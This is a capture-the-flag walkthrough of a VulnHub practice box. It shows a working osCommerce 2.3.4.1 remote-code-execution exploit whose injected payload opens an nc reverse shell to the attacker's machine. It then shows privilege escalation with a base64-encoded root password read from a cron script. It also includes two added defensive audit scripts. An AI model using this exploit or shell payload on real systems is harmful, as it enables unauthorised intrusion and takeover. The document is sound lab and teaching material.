This will also be brief. It’s FUNBOX: UNDER CONSTRUCTION! from VulnHub:

As always, it’s a very easy box for beginners.

Ports

This one has SSH, HTTP and various mail ports - for SMTP, POP3 and IMAP. We’re interested in the web stuff.

HTTP

At http://192.168.1.78/catalog/ we find osCommerce Online Merchant v2.3.4.1 which has various exploits. We can grab an unauthenticated RCE exploit from searchsploit and edit it:

# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.


import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://192.168.1.78/catalog/"
target_url = "http://192.168.1.78/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += 'system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.210 1234 >/tmp/f");'    # this is where you enter you PHP payload
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")

Note the above has been modified for the correct URLs and it sends me a reverse shell, like so:

┌──(root💀kali)-[/opt/vulnhub/funbox10]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.78] 33868
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@funbox10:/var/www/html/catalog/install/includes$
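The root cause above is a leftover /install/ directory plus a configure.php the web server can rewrite. Here is an added hardening check (not part of the original write-up and not osCommerce's own code) that audits an osCommerce document root for exactly those two conditions. The install/ and includes/configure.php paths are osCommerce's standard layout; the function names and the constructed sample tree are assumptions for the demo.

```python
import os
import stat
import tempfile

# Hypothetical post-install audit for the osCommerce weakness described above:
# the shipped install/ directory must be deleted after setup, and the generated
# includes/configure.php must not be writable by the web server account.
# Function names are assumptions; the paths follow osCommerce's own layout.


def audit_oscommerce_root(doc_root):
    """Return a list of human-readable findings for one osCommerce document root."""
    findings = []
    install_dir = os.path.join(doc_root, "install")
    if os.path.isdir(install_dir):
        findings.append("install/ directory still present: delete it after setup")
        # install.php?step=4 writes this file; if it exists the installer has been reachable
        if os.path.isfile(os.path.join(install_dir, "includes", "configure.php")):
            findings.append("install/includes/configure.php exists: installer output is web-reachable")
    for rel in ("includes/configure.php", "admin/includes/configure.php"):
        path = os.path.join(doc_root, rel)
        if not os.path.isfile(path):
            continue
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{rel} is group/world-writable (mode {oct(mode)})")
    return findings


def build_sample_root(hardened=False):
    """Build a constructed osCommerce-like tree in a temp dir (sample data, not a real install)."""
    root = tempfile.mkdtemp(prefix="osc_")
    os.makedirs(os.path.join(root, "includes"))
    cfg = os.path.join(root, "includes", "configure.php")
    with open(cfg, "w") as f:
        f.write("<?php define('DB_DATABASE', 'shop');\n")
    if hardened:
        os.chmod(cfg, 0o440)
    else:
        # weak deployment: writable config and the installer left in place
        os.chmod(cfg, 0o666)
        os.makedirs(os.path.join(root, "install", "includes"))
        with open(os.path.join(root, "install", "includes", "configure.php"), "w") as f:
            f.write("<?php // written by install.php?step=4\n")
    return root


def demo():
    """Audit a weak and a hardened constructed tree; returns (weak_findings, hardened_findings)."""
    return (audit_oscommerce_root(build_sample_root()),
            audit_oscommerce_root(build_sample_root(hardened=True)))


if __name__ == "__main__":
    weak, hardened = demo()
    print("weak deployment:", *weak, sep="\n  ")
    print("hardened deployment:", hardened or "no findings")
```

Run it against a real document root with `audit_oscommerce_root("/var/www/html/catalog")`; an empty list means the installer is gone and the config is read-only for the web user.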

Privesc

I’m going to explain this slightly backwards. There is a cronjob running as the user Joe:

root@funbox10:/var/spool/cron/crontabs# cat joe
cat joe
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.wWLDXL/crontab installed on Mon Jul 19 13:24:20 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/1 * * * * /usr/share/doc/examples/cron.sh

This calls a shell script that we can read:

www-data@funbox10:/$ cat /usr/share/doc/examples/cron.sh
cat /usr/share/doc/examples/cron.sh
# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==

That script contains the root password, base64-encoded:

www-data@funbox10:/$ echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
echo LXUgcm9vdCAtcCByZnZiZ3QhIQ== | base64 -d
-u root -p rfvbgt!!www-data@funbox10:/$ su root
su root
Password: rfvbgt!!

root@funbox10:/# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
funbox10
Sun Aug  1 12:14:04 CEST 2021

How did we know this? Pspy can find it, although it seems a bit flaky. Anyhoo, we move on….
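Rather than waiting for pspy to catch the job, a defender can audit this statically: walk a user's crontab, open each script it invokes, and flag base64-looking tokens that decode to credential-like text. The following is an added example (not from the original write-up or from any tool the post uses). The crontab and script contents are constructed samples modelled on the box, the encoded string is the one shown above, and the function names and credential hints are assumptions.

```python
import base64
import re

# Constructed samples modelled on the crontab and cron.sh shown above.
# The second encoded token is a benign addition so the filter has something to skip.
SAMPLE_CRONTAB = """# m h  dom mon dow   command
*/1 * * * * /usr/share/doc/examples/cron.sh
"""
SAMPLE_FILES = {
    "/usr/share/doc/examples/cron.sh": (
        "# cron.sh sample file\n"
        "# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==\n"
        "# rotation id: aGVsbG8gd29ybGQ=\n"
    ),
}

# A run of base64 alphabet characters (16+) with optional padding, not glued to other token chars.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Substrings that make a decoded token look like a credential (assumed list, extend as needed).
CRED_HINTS = ("-p ", "--password", "password", "passwd", "-u root")


def decode_candidate(token):
    """Return the decoded text if the token is valid base64 of printable UTF-8, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_encoded_secrets(script_text):
    """Return (line number, token, decoded text) for every credential-like encoded token."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for m in B64_TOKEN.finditer(line):
            decoded = decode_candidate(m.group(0))
            if decoded is None:
                continue
            if any(hint in decoded.lower() for hint in CRED_HINTS):
                hits.append((lineno, m.group(0), decoded))
    return hits


def commands_from_crontab(crontab_text):
    """Extract the command field from each active crontab entry (5 time fields + command)."""
    cmds = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            cmds.append(fields[5])
    return cmds


def audit_cron(crontab_text, read_script):
    """Map each cron-invoked script path to the encoded secrets found in it.

    read_script(path) returns the script's text or None; pass a dict's .get for
    offline use, or a wrapper around open() on a live host.
    """
    report = {}
    for cmd in commands_from_crontab(crontab_text):
        path = cmd.split()[0]
        content = read_script(path)
        if content is None:
            continue
        hits = find_encoded_secrets(content)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in audit_cron(SAMPLE_CRONTAB, SAMPLE_FILES.get).items():
        for lineno, token, decoded in hits:
            print(f"{path}:{lineno}: {token} -> {decoded!r}")
```

On a live host the same audit runs over /var/spool/cron/crontabs/* with a reader that opens each path; the point of the separate reader is that the logic can be unit-tested without touching the filesystem.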